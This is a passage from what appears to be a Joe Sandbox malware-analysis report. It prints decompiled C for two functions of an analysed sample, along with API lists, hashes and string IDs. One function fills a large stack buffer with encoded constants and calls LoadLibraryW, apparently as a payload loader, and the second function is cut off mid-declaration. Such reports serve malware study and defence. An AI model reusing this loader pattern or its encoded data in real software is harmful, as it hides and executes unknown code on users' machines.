                  • Instruction Fuzzy Hash: 9B82B4F0C467698FDB618F429E8438EBA75BB51345F5096C9C29C3A204CB750BC2CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 83%
                  			E00408CD5(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
                  				intOrPtr _v356;
                  				intOrPtr _v360;
                  				intOrPtr _v364;
                  				intOrPtr _v368;
                  				intOrPtr _v372;
                  				intOrPtr _v376;
                  				intOrPtr _v380;
                  				intOrPtr _v384;
                  				intOrPtr _v388;
                  				intOrPtr _v392;
                  				intOrPtr _v396;
                  				intOrPtr _v400;
                  				intOrPtr _v404;
                  				intOrPtr _v408;
                  				intOrPtr _v412;
                  				intOrPtr _v416;
                  				intOrPtr _v420;
                  				intOrPtr _v424;
                  				intOrPtr _v428;
                  				intOrPtr _v432;
                  				intOrPtr _v436;
                  				intOrPtr _v440;
                  				intOrPtr _v444;
                  				intOrPtr _v448;
                  				intOrPtr _v452;
                  				intOrPtr _v456;
                  				intOrPtr _v460;
                  				intOrPtr _v464;
                  				intOrPtr _v468;
                  				intOrPtr _v472;
                  				intOrPtr _v476;
                  				intOrPtr _v480;
                  				intOrPtr _v484;
                  				intOrPtr _v488;
                  				intOrPtr _v492;
                  				intOrPtr _v496;
                  				intOrPtr _v500;
                  				intOrPtr _v504;
                  				intOrPtr _v508;
                  				intOrPtr _v512;
                  				intOrPtr _v516;
                  				intOrPtr _v520;
                  				intOrPtr _v524;
                  				intOrPtr _v528;
                  				intOrPtr _v532;
                  				intOrPtr _v536;
                  				intOrPtr _v540;
                  				intOrPtr _v544;
                  				intOrPtr _v548;
                  				intOrPtr _v552;
                  				intOrPtr _v556;
                  				intOrPtr _v560;
                  				intOrPtr _v564;
                  				intOrPtr _v568;
                  				intOrPtr _v572;
                  				intOrPtr _v576;
                  				intOrPtr _v580;
                  				intOrPtr _v584;
                  				intOrPtr _v588;
                  				intOrPtr _v592;
                  				intOrPtr _v596;
                  				intOrPtr _v600;
                  				intOrPtr _v604;
                  				intOrPtr _v608;
                  				intOrPtr _v612;
                  				intOrPtr _v616;
                  				intOrPtr _v620;
                  				intOrPtr _v624;
                  				intOrPtr _v628;
                  				intOrPtr _v632;
                  				intOrPtr _v636;
                  				intOrPtr _v640;
                  				intOrPtr _v644;
                  				intOrPtr _v648;
                  				intOrPtr _v652;
                  				intOrPtr _v656;
                  				intOrPtr _v660;
                  				intOrPtr _v664;
                  				intOrPtr _v668;
                  				intOrPtr _v672;
                  				intOrPtr _v676;
                  				intOrPtr _v680;
                  				intOrPtr _v684;
                  				intOrPtr _v688;
                  				intOrPtr _v692;
                  				intOrPtr _v696;
                  				intOrPtr _v700;
                  				intOrPtr _v704;
                  				intOrPtr _v708;
                  				intOrPtr _v712;
                  				intOrPtr _v716;
                  				intOrPtr _v720;
                  				intOrPtr _v724;
                  				intOrPtr _v728;
                  				intOrPtr _v732;
                  				intOrPtr _v736;
                  				intOrPtr _v740;
                  				intOrPtr _v744;
                  				intOrPtr _v748;
                  				intOrPtr _v752;
                  				intOrPtr _v756;
                  				intOrPtr _v760;
                  				intOrPtr _v764;
                  				intOrPtr _v768;
                  				intOrPtr _v772;
                  				intOrPtr _v776;
                  				intOrPtr _v780;
                  				intOrPtr _v784;
                  				intOrPtr _v788;
                  				intOrPtr _v792;
                  				intOrPtr _v796;
                  				intOrPtr _v800;
                  				intOrPtr _v804;
                  				intOrPtr _v808;
                  				intOrPtr _v812;
                  				intOrPtr _v816;
                  				intOrPtr _v820;
                  				intOrPtr _v824;
                  				intOrPtr _v828;
                  				intOrPtr _v832;
                  				intOrPtr _v836;
                  				intOrPtr _v840;
                  				intOrPtr _v844;
                  				intOrPtr _v848;
                  				intOrPtr _v852;
                  				intOrPtr _v856;
                  				intOrPtr _v860;
                  				intOrPtr _v864;
                  				intOrPtr _v868;
                  				intOrPtr _v872;
                  				intOrPtr _v876;
                  				intOrPtr _v880;
                  				intOrPtr _v884;
                  				intOrPtr _v888;
                  				intOrPtr _v892;
                  				intOrPtr _v896;
                  				intOrPtr _v900;
                  				intOrPtr _v904;
                  				intOrPtr _v908;
                  				intOrPtr _v912;
                  				intOrPtr _v916;
                  				intOrPtr _v920;
                  				intOrPtr _v924;
                  				intOrPtr _v928;
                  				intOrPtr _v932;
                  				intOrPtr _v936;
                  				intOrPtr _v940;
                  				intOrPtr _v944;
                  				intOrPtr _v948;
                  				intOrPtr _v952;
                  				intOrPtr _v956;
                  				intOrPtr _v960;
                  				intOrPtr _v964;
                  				intOrPtr _v968;
                  				intOrPtr _v972;
                  				intOrPtr _v976;
                  				intOrPtr _v980;
                  				intOrPtr _v984;
                  				intOrPtr _v988;
                  				intOrPtr _v992;
                  				intOrPtr _v996;
                  				intOrPtr _v1000;
                  				intOrPtr _v1004;
                  				intOrPtr _v1008;
                  				intOrPtr _v1012;
                  				intOrPtr _v1016;
                  				intOrPtr _v1020;
                  				intOrPtr _v1024;
                  				intOrPtr _v1028;
                  				intOrPtr _v1032;
                  				intOrPtr _v1036;
                  				intOrPtr _v1040;
                  				intOrPtr _v1044;
                  				intOrPtr _v1048;
                  				intOrPtr _v1052;
                  				intOrPtr _v1056;
                  				intOrPtr _v1060;
                  				intOrPtr _v1064;
                  				intOrPtr _v1068;
                  				intOrPtr _v1072;
                  				intOrPtr _v1076;
                  				intOrPtr _v1080;
                  				intOrPtr _v1084;
                  				intOrPtr _v1088;
                  				intOrPtr _v1092;
                  				intOrPtr _v1096;
                  				intOrPtr _v1100;
                  				intOrPtr _v1104;
                  				intOrPtr _v1108;
                  				intOrPtr _v1112;
                  				intOrPtr _v1116;
                  				intOrPtr _v1120;
                  				intOrPtr _v1124;
                  				intOrPtr _v1128;
                  				intOrPtr _v1132;
                  				intOrPtr _v1136;
                  				intOrPtr _v1140;
                  				intOrPtr _v1144;
                  				intOrPtr _v1148;
                  				intOrPtr _v1152;
                  				intOrPtr _v1156;
                  				intOrPtr _v1160;
                  				intOrPtr _v1164;
                  				intOrPtr _v1168;
                  				intOrPtr _v1172;
                  				intOrPtr _v1176;
                  				intOrPtr _v1180;
                  				intOrPtr _v1184;
                  				intOrPtr _v1188;
                  				intOrPtr _v1192;
                  				intOrPtr _v1196;
                  				intOrPtr _v1200;
                  				intOrPtr _v1204;
                  				intOrPtr _v1208;
                  				intOrPtr _v1212;
                  				intOrPtr _v1216;
                  				intOrPtr _v1220;
                  				intOrPtr _v1224;
                  				intOrPtr _v1228;
                  				intOrPtr _v1232;
                  				intOrPtr _v1236;
                  				intOrPtr _v1240;
                  				intOrPtr _v1244;
                  				intOrPtr _v1248;
                  				intOrPtr _v1252;
                  				intOrPtr _v1256;
                  				intOrPtr _v1260;
                  				intOrPtr _v1264;
                  				intOrPtr _v1268;
                  				intOrPtr _v1272;
                  				intOrPtr _v1276;
                  				intOrPtr _v1280;
                  				intOrPtr _v1284;
                  				intOrPtr _v1288;
                  				intOrPtr _v1292;
                  				intOrPtr _v1296;
                  				intOrPtr _v1300;
                  				intOrPtr _v1304;
                  				intOrPtr _v1308;
                  				intOrPtr _v1312;
                  				intOrPtr _v1316;
                  				intOrPtr _v1320;
                  				intOrPtr _v1324;
                  				intOrPtr _v1328;
                  				intOrPtr _v1332;
                  				intOrPtr _v1336;
                  				intOrPtr _v1340;
                  				intOrPtr _v1344;
                  				intOrPtr _v1348;
                  				intOrPtr _v1352;
                  				intOrPtr _v1356;
                  				intOrPtr _v1360;
                  				intOrPtr _v1364;
                  				intOrPtr _v1368;
                  				intOrPtr _v1372;
                  				intOrPtr _v1376;
                  				intOrPtr _v1380;
                  				intOrPtr _v1384;
                  				intOrPtr _v1388;
                  				intOrPtr _v1392;
                  				intOrPtr _v1396;
                  				intOrPtr _v1400;
                  				intOrPtr _v1404;
                  				intOrPtr _v1408;
                  				intOrPtr _v1412;
                  				intOrPtr _v1416;
                  				intOrPtr _v1420;
                  				intOrPtr _v1424;
                  				intOrPtr _v1428;
                  				intOrPtr _v1432;
                  				intOrPtr _v1436;
                  				intOrPtr _v1440;
                  				intOrPtr _v1444;
                  				intOrPtr _v1448;
                  				intOrPtr _v1452;
                  				intOrPtr _v1456;
                  				intOrPtr _v1460;
                  				intOrPtr _v1464;
                  				intOrPtr _v1468;
                  				intOrPtr _v1472;
                  				intOrPtr _v1476;
                  				intOrPtr _v1480;
                  				intOrPtr _v1484;
                  				intOrPtr _v1488;
                  				intOrPtr _v1492;
                  				intOrPtr _v1496;
                  				intOrPtr _v1500;
                  				intOrPtr _v1504;
                  				intOrPtr _v1508;
                  				intOrPtr _v1512;
                  				intOrPtr _v1516;
                  				intOrPtr _v1520;
                  				intOrPtr _v1524;
                  				intOrPtr _v1528;
                  				intOrPtr _v1532;
                  				intOrPtr _v1536;
                  				intOrPtr _v1540;
                  				intOrPtr _v1544;
                  				intOrPtr _v1548;
                  				intOrPtr _v1552;
                  				intOrPtr _v1556;
                  				char _v1560;
                  
                  				_v1560 = 0x4befb69c;
                  				_v1556 = 0xe2a7d93;
                  				_v1552 = 0xec58315b;
                  				_v1548 = 0xf479b9e5;
                  				_v1544 = 0x3655e0b3;
                  				_v1540 = 0x1788529f;
                  				_v1536 = 0xf8a87d29;
                  				_v1532 = 0x6a1c103e;
                  				_v1528 = 0xa3a4c637;
                  				_v1524 = 0xdd4d869a;
                  				_v1520 = 0xda58f7da;
                  				_v1516 = 0xa4aa4a18;
                  				_v1512 = 0xf64937e7;
                  				_v1508 = 0xa4ae6a93;
                  				_v1504 = 0x4a93dd70;
                  				_v1500 = 0x15b491d3;
                  				_v1496 = 0xb70e4dcf;
                  				_v1492 = 0xfb7fcaa2;
                  				_v1488 = 0x5ce8c08f;
                  				_v1484 = 0x83c7a18c;
                  				_v1480 = 0x6c649979;
                  				_v1476 = 0x8a267553;
                  				_v1472 = 0x14352803;
                  				_v1468 = 0xf6f6795d;
                  				_v1464 = 0xcc94b246;
                  				_v1460 = 0xbe9f1468;
                  				_v1456 = 0x3ef68f3a;
                  				_v1452 = 0x8360e0ee;
                  				_v1448 = 0xdd8b73c8;
                  				_v1444 = 0xfc9700e;
                  				_v1440 = 0x718d1c8;
                  				_v1436 = 0xffb7254;
                  				_v1432 = 0x286ed90a;
                  				_v1428 = 0x1b23db2c;
                  				_v1424 = 0xda2233ed;
                  				_v1420 = 0xbc53fd27;
                  				_v1416 = 0xde98ddd2;
                  				_v1412 = 0xb4314b61;
                  				_v1408 = 0xea162a4;
                  				_v1404 = 0xc02a9ba2;
                  				_v1400 = 0x967ce52;
                  				_v1396 = 0xabfbe251;
                  				_v1392 = 0x175cb512;
                  				_v1388 = 0xf8447fac;
                  				_v1384 = 0x2eac2eac;
                  				_v1380 = 0xf4344c6a;
                  				_v1376 = 0xbbdcaee3;
                  				_v1372 = 0xe99636da;
                  				_v1368 = 0x13a7e5e1;
                  				_v1364 = 0xff3c9bed;
                  				_v1360 = 0x8dbfbd40;
                  				_v1356 = 0xb185ff34;
                  				_v1352 = 0xcace94c2;
                  				_v1348 = 0xc80d6527;
                  				_v1344 = 0xa606e2ad;
                  				_v1340 = 0x6ae37e45;
                  				_v1336 = 0x282fa05a;
                  				_v1332 = 0x88a6d551;
                  				_v1328 = 0x1ff98e41;
                  				_v1324 = 0x5afaf771;
                  				_v1320 = 0xebf0ac61;
                  				_v1316 = 0x51130de3;
                  				_v1312 = 0xa1336917;
                  				_v1308 = 0x7a2f88ee;
                  				_v1304 = 0x718b7c64;
                  				_v1300 = 0xf2ab104c;
                  				_v1296 = 0xb1a7a998;
                  				_v1292 = 0x268c77d7;
                  				_v1288 = 0x9a6fd234;
                  				_v1284 = 0x60166448;
                  				_v1280 = 0xe602cf3d;
                  				_v1276 = 0x71c5ac19;
                  				_v1272 = 0xd33a43b2;
                  				_v1268 = 0x27eb747f;
                  				_v1264 = 0x1470ea9a;
                  				_v1260 = 0xa144ffe1;
                  				_v1256 = 0xd6d9720b;
                  				_v1252 = 0x9286eb36;
                  				_v1248 = 0x2aefe3bd;
                  				_v1244 = 0xed564a2f;
                  				_v1240 = 0xa9426475;
                  				_v1236 = 0x2bf8a593;
                  				_v1232 = 0xd0a447e5;
                  				_v1228 = 0x48052515;
                  				_v1224 = 0x3e8ebb64;
                  				_v1220 = 0xfe618b29;
                  				_v1216 = 0x751b8d9a;
                  				_v1212 = 0xd44d92f4;
                  				_v1208 = 0x5d775a9c;
                  				_v1204 = 0x62856083;
                  				_v1200 = 0xf5056c81;
                  				_v1196 = 0x29043594;
                  				_v1192 = 0x4ba08155;
                  				_v1188 = 0x2b9a15db;
                  				_v1184 = 0x15929201;
                  				_v1180 = 0x3631bff8;
                  				_v1176 = 0x959afeae;
                  				_v1172 = 0x1b996608;
                  				_v1168 = 0x9f6b0905;
                  				_v1164 = 0x6541544e;
                  				_v1160 = 0x3b4276c2;
                  				_v1156 = 0x449b5732;
                  				_v1152 = 0xeeda9290;
                  				_v1148 = 0xdcaa8116;
                  				_v1144 = 0xa1baec1f;
                  				_v1140 = 0x1470c0f3;
                  				_v1136 = 0x3e6a5a1a;
                  				_v1132 = 0x3833bb5d;
                  				_v1128 = 0xdb45c3d4;
                  				_v1124 = 0x27574c46;
                  				_v1120 = 0xa80b0835;
                  				_v1116 = 0xfcd6c910;
                  				_v1112 = 0xe990762e;
                  				_v1108 = 0xe0d8e335;
                  				_v1104 = 0x34abe755;
                  				_v1100 = 0x56597a74;
                  				_v1096 = 0xb103ce43;
                  				_v1092 = 0xef319e25;
                  				_v1088 = 0x22a91b8d;
                  				_v1084 = 0xf82edbd2;
                  				_v1080 = 0x3b4b8d37;
                  				_v1076 = 0x338cfe68;
                  				_v1072 = 0xf29573ff;
                  				_v1068 = 0x563e81d6;
                  				_v1064 = 0x548c86c1;
                  				_v1060 = 0x4468b232;
                  				_v1056 = 0xede258c9;
                  				_v1052 = 0x7c8c7e70;
                  				_v1048 = 0xd17a549a;
                  				_v1044 = 0xaf47054c;
                  				_v1040 = 0x8e7aa5fb;
                  				_v1036 = 0xda162cad;
                  				_v1032 = 0x7f4adfe2;
                  				_v1028 = 0xb42a2fff;
                  				_v1024 = 0x7179f28c;
                  				_v1020 = 0xcf51a6c7;
                  				_v1016 = 0xb6332844;
                  				_v1012 = 0xfdcdaa4c;
                  				_v1008 = 0xb14c459d;
                  				_v1004 = 0x7564d49e;
                  				_v1000 = 0x8f70fe3c;
                  				_v996 = 0xdc36cd7d;
                  				_v992 = 0x63e63e71;
                  				_v988 = 0x5edb739d;
                  				_v984 = 0x1cd504ef;
                  				_v980 = 0x93b57070;
                  				_v976 = 0x28a54980;
                  				_v972 = 0x64ef1114;
                  				_v968 = 0xed02e6be;
                  				_v964 = 0xabe7464c;
                  				_v960 = 0xe34a9f4f;
                  				_v956 = 0x38e0f1e6;
                  				_v952 = 0xec04582b;
                  				_v948 = 0x61693d0f;
                  				_v944 = 0xe21a0b35;
                  				_v940 = 0xc48c0b6a;
                  				_v936 = 0xfc0bfcd2;
                  				_v932 = 0xe781bd04;
                  				_v928 = 0x148c9f07;
                  				_v924 = 0x29cccea2;
                  				_v920 = 0xae046087;
                  				_v916 = 0x170e2607;
                  				_v912 = 0xfb9e28d9;
                  				_v908 = 0xc5f3c745;
                  				_v904 = 0x2064696d;
                  				_v900 = 0xfffefc0b;
                  				_v896 = 0xf75d58e6;
                  				_v892 = 0xdd0c0350;
                  				_v888 = 0xee345fd5;
                  				_v884 = 0x15c0bc71;
                  				_v880 = 0xfc21594b;
                  				_v876 = 0xf7d17b82;
                  				_v872 = 0xc53fb9bc;
                  				_v868 = 0x3db78dd2;
                  				_v864 = 0x5aa3eff4;
                  				_v860 = 0x4ffb8986;
                  				_v856 = 0x679dc3d7;
                  				_v852 = 0xf57679b7;
                  				_v848 = 0xd4a33e35;
                  				_v844 = 0x17525c45;
                  				_v840 = 0x2f705952;
                  				_v836 = 0x4709a022;
                  				_v832 = 0xe1344555;
                  				_v828 = 0xd80a835f;
                  				_v824 = 0x615f5253;
                  				_v820 = 0x5433de81;
                  				_v816 = 0x54f130f8;
                  				_v812 = 0x4823fa93;
                  				_v808 = 0xb927d63b;
                  				_v804 = 0xa075442;
                  				_v800 = 0xf027a5bf;
                  				_v796 = 0x1ff6d87a;
                  				_v792 = 0x717d95e8;
                  				_v788 = 0xc7adf187;
                  				_v784 = 0x41178485;
                  				_v780 = 0xd28e7ea8;
                  				_v776 = 0xd30c5935;
                  				_v772 = 0x323cce37;
                  				_v768 = 0x3b66b84b;
                  				_v764 = 0x93a4a480;
                  				_v760 = 0xc6f91e4c;
                  				_v756 = 0x878d3e1c;
                  				_v752 = 0xacbe73e0;
                  				_v748 = 0x39411ffd;
                  				_v744 = 0x51956353;
                  				_v740 = 0xeae86d79;
                  				_v736 = 0x74761c39;
                  				_v732 = 0x61d7b190;
                  				_v728 = 0xa072a497;
                  				_v724 = 0x958dee7a;
                  				_v720 = 0x9e671c60;
                  				_v716 = 0xd2430678;
                  				_v712 = 0x94c08196;
                  				_v708 = 0x965ab2f9;
                  				_v704 = 0x29b1888a;
                  				_v700 = 0x32e7db29;
                  				_v696 = 0xc7764655;
                  				_v692 = 0x6f1caa55;
                  				_v688 = 0x9eb0d2f;
                  				_v684 = 0x880161c9;
                  				_v680 = 0xa1c00ce3;
                  				_v676 = 0xc1d28a66;
                  				_v672 = 0xcc72ca45;
                  				_v668 = 0x97b55c25;
                  				_v664 = 0x8558f7e3;
                  				_v660 = 0x8ac5a732;
                  				_v656 = 0x6245af98;
                  				_v652 = 0xabcc6957;
                  				_v648 = 0x7e544f4d;
                  				_v644 = 0x43da5efa;
                  				_v640 = 0x781609ef;
                  				_v636 = 0x4617ba68;
                  				_v632 = 0xdfef7616;
                  				_v628 = 0x999614b7;
                  				_v624 = 0xb1861e95;
                  				_v620 = 0xe7f3ecef;
                  				_v616 = 0x74d5be3b;
                  				_v612 = 0x3fc5e28;
                  				_v608 = 0x1dd16ad;
                  				_v604 = 0x1052e4f9;
                  				_v600 = 0x65c2038a;
                  				_v596 = 0xd0c421c0;
                  				_v592 = 0xbc4682ff;
                  				_v588 = 0x32e7b9aa;
                  				_v584 = 0xd10fbd07;
                  				_v580 = 0xedbcb66b;
                  				_v576 = 0x2000143;
                  				_v572 = 0xcb14edfd;
                  				_v568 = 0xcf05854d;
                  				_v564 = 0xa88f0fe2;
                  				_v560 = 0xb803256e;
                  				_v556 = 0xb644a825;
                  				_v552 = 0xeeba0c9d;
                  				_v548 = 0x388db315;
                  				_v544 = 0x76b2629a;
                  				_v540 = 0xf626cd97;
                  				_v536 = 0x5ffbfc65;
                  				_v532 = 0x63532dab;
                  				_v528 = 0xc99a8036;
                  				_v524 = 0x3db019be;
                  				_v520 = 0xb8a25e3b;
                  				_v516 = 0x27c55253;
                  				_v512 = 0x64213913;
                  				_v508 = 0x1fc02174;
                  				_v504 = 0x74194bd1;
                  				_v500 = 0xc2830dba;
                  				_v496 = 0x59201bb3;
                  				_v492 = 0xf0a50b26;
                  				_v488 = 0x30a58ab3;
                  				_v484 = 0xe5059002;
                  				_v480 = 0xf326a3d3;
                  				_v476 = 0x98f99278;
                  				_v472 = 0xe9d966bc;
                  				_v468 = 0xab4cde5d;
                  				_v464 = 0x808fb1a1;
                  				_v460 = 0xd56d9e3e;
                  				_v456 = 0x4fc3d42f;
                  				_v452 = 0xe97c9080;
                  				_v448 = 0x5fec54a8;
                  				_v444 = 0x554cc6e2;
                  				_v440 = 0x7ae3fc51;
                  				_v436 = 0x3db9e987;
                  				_v432 = 0x270657d8;
                  				_v428 = 0x91df6386;
                  				_v424 = 0xa06420f6;
                  				_v420 = 0xb645fca2;
                  				_v416 = 0x9c6867fb;
                  				_v412 = 0x519fe36b;
                  				_v408 = 0xb7531c61;
                  				_v404 = 0xf5fc84f3;
                  				_v400 = 0x26cd3d1f;
                  				_v396 = 0x472b53f7;
                  				_v392 = 0xf96b6641;
                  				_v388 = 0xabeb68fc;
                  				_v384 = 0xeff2f92;
                  				_v380 = 0x12bd2dda;
                  				_v376 = 0xad0b7b64;
                  				_v372 = 0x1ba50940;
                  				_v368 = 0xd9508423;
                  				_v364 = 0x5b6a112d;
                  				_v360 = 0x4c072a9e;
                  				_v356 = 0xcd632d88;
                  				_v352 = 0x86676816;
                  				_v348 = 0x11d5ce75;
                  				_v344 = 0x4d839846;
                  				_v340 = 0x61a20281;
                  				_v336 = 0x7d4b08cc;
                  				_v332 = 0xe75e3c98;
                  				_v328 = 0xa09673de;
                  				_v324 = 0x4fcdca3;
                  				_v320 = 0x87caecd;
                  				_v316 = 0x8bb0de23;
                  				_v312 = 0x8bb4e855;
                  				_v308 = 0xd5e4f17c;
                  				_v304 = 0x6ce7b55c;
                  				_v300 = 0x2917ee1f;
                  				_v296 = 0xb765a1eb;
                  				_v292 = 0x17313737;
                  				_v288 = 0x491b73e5;
                  				_v284 = 0x60893bf9;
                  				_v280 = 0x8ed66181;
                  				_v276 = 0xd3c82709;
                  				_v272 = 0x74742dcc;
                  				_v268 = 0xb70f62bb;
                  				_v264 = 0x46e9044d;
                  				_v260 = 0xddfb36c2;
                  				_v256 = 0x1c14621e;
                  				_v252 = 0x3bba477e;
                  				_v248 = 0x1f5f3936;
                  				_v244 = 0xb8113197;
                  				_v240 = 0x1a909f95;
                  				_v236 = 0x2ff6f937;
                  				_v232 = 0x906b0598;
                  				_v228 = 0xeb5ff201;
                  				_v224 = 0x6f534f00;
                  				_v220 = 0x396a258d;
                  				_v216 = 0xdc74f9cd;
                  				_v212 = 0x9606240;
                  				_v208 = 0xeece9328;
                  				_v204 = 0x98343d05;
                  				_v200 = 0x46089577;
                  				_v196 = 0x8ca5a500;
                  				_v192 = 0x5fa8daa2;
                  				_v188 = 0xfebc41a3;
                  				_v184 = 0x4f16be69;
                  				_v180 = 0x5fcd3ff2;
                  				_v176 = 0x290cab8a;
                  				_v172 = 0x9084f10f;
                  				_v168 = 0x21f4372d;
                  				_v164 = 0xf77c0e4f;
                  				_v160 = 0xee8b3883;
                  				_v156 = 0x9d87c954;
                  				_v152 = 0xb5dc9ad1;
                  				_v148 = 0x31d7efed;
                  				_v144 = 0x23271e7d;
                  				_v140 = 0x2030c0b1;
                  				_v136 = 0x89cc42fd;
                  				_v132 = 0x855c1fdb;
                  				_v128 = 0x4586f4e2;
                  				_v124 = 0x6c1867c5;
                  				_v120 = 0x2b50d8a6;
                  				_v116 = 0xd392eb31;
                  				_v112 = 0x5adcea22;
                  				_v108 = 0xb0c01b07;
                  				_v104 = 0xfc9581f8;
                  				_v100 = 0x8a3c0db7;
                  				_v96 = 0xf184c207;
                  				_v92 = 0xf7612506;
                  				_v88 = 0xc77cedd3;
                  				_v84 = 0x456eed47;
                  				_v80 = 0x4d7c6473;
                  				_v76 = 0xf66fe5bc;
                  				_v72 = 0x3b81c48e;
                  				_v68 = 0x4ca88e47;
                  				_v64 = 0xf1f7108e;
                  				_v60 = 0xb6ad32aa;
                  				_v56 = 0xa746cf25;
                  				_v52 = 0x76783488;
                  				_v48 = 0x8a52240d;
                  				_v44 = 0xf4ff14a7;
                  				_v40 = 0xf0d384e;
                  				_v36 = 0x88b9944;
                  				_v32 = 0x8289fea5;
                  				_v28 = 0xf70587d8;
                  				_v24 = 0xecf5125b;
                  				_v20 = 0x4b2bcabe;
                  				_v16 = 0x645459e0;
                  				_v12 = 0x8f09d154;
                  				_v8 = 0x7a530fa7;
                  				_t400 = E00401A52(0x412980, 0x72fc3a35);
                  				 *0x4164f4 = LoadLibraryW(_t391);
                  				L00401B09(_t400);
                  				_push(0x414e70);
                  				_push(0x4fb37d17);
                  				return E004012FF( *0x4164f4,  &_v1560, 0x185);
                  			}

                  APIs
                  • LoadLibraryW.KERNEL32(00000000), ref: 00409BC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: LibraryLoad
                  • String ID: /$/JV$@b`$E~j$FLW'$GnE$MOT~$NTAe$RYp/$SR_a$UE4$[1X$mid $q>c$sd|M$tzYV$ym$YTd
                  • API String ID: 1029625771-3197268478
                  • Opcode ID: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction ID: a2473892be70d7853f5d3ab73c35abe6bfda1bb905b43dc05c267480b0676288
                  • Opcode Fuzzy Hash: 964287715a5c159c8613d9b1a8f68429259ed4a0fe6ae7de7cc1a883e1cc3d30
                  • Instruction Fuzzy Hash: 176295F48467698BDB61DF429E847CEBA75BB51345F6096C8C29C3B214CB710B82CF89
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Control-flow Graph

                  C-Code - Quality: 83%
                  			E0040B6B5(void* __eflags) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				intOrPtr _v76;
                  				intOrPtr _v80;
                  				intOrPtr _v84;
                  				intOrPtr _v88;
                  				intOrPtr _v92;
                  				intOrPtr _v96;
                  				intOrPtr _v100;
                  				intOrPtr _v104;
                  				intOrPtr _v108;
                  				intOrPtr _v112;
                  				intOrPtr _v116;
                  				intOrPtr _v120;
                  				intOrPtr _v124;
                  				intOrPtr _v128;
                  				intOrPtr _v132;
                  				intOrPtr _v136;
                  				intOrPtr _v140;
                  				intOrPtr _v144;
                  				intOrPtr _v148;
                  				intOrPtr _v152;
                  				intOrPtr _v156;
                  				intOrPtr _v160;
                  				intOrPtr _v164;
                  				intOrPtr _v168;
                  				intOrPtr _v172;
                  				intOrPtr _v176;
                  				intOrPtr _v180;
                  				intOrPtr _v184;
                  				intOrPtr _v188;
                  				intOrPtr _v192;
                  				intOrPtr _v196;
                  				intOrPtr _v200;
                  				intOrPtr _v204;
                  				intOrPtr _v208;
                  				intOrPtr _v212;
                  				intOrPtr _v216;
                  				intOrPtr _v220;
                  				intOrPtr _v224;
                  				intOrPtr _v228;
                  				intOrPtr _v232;
                  				intOrPtr _v236;
                  				intOrPtr _v240;
                  				intOrPtr _v244;
                  				intOrPtr _v248;
                  				intOrPtr _v252;
                  				intOrPtr _v256;
                  				intOrPtr _v260;
                  				intOrPtr _v264;
                  				intOrPtr _v268;
                  				intOrPtr _v272;
                  				intOrPtr _v276;
                  				intOrPtr _v280;
                  				intOrPtr _v284;
                  				intOrPtr _v288;
                  				intOrPtr _v292;
                  				intOrPtr _v296;
                  				intOrPtr _v300;
                  				intOrPtr _v304;
                  				intOrPtr _v308;
                  				intOrPtr _v312;
                  				intOrPtr _v316;
                  				intOrPtr _v320;
                  				intOrPtr _v324;
                  				intOrPtr _v328;
                  				intOrPtr _v332;
                  				intOrPtr _v336;
                  				intOrPtr _v340;
                  				intOrPtr _v344;
                  				intOrPtr _v348;
                  				intOrPtr _v352;
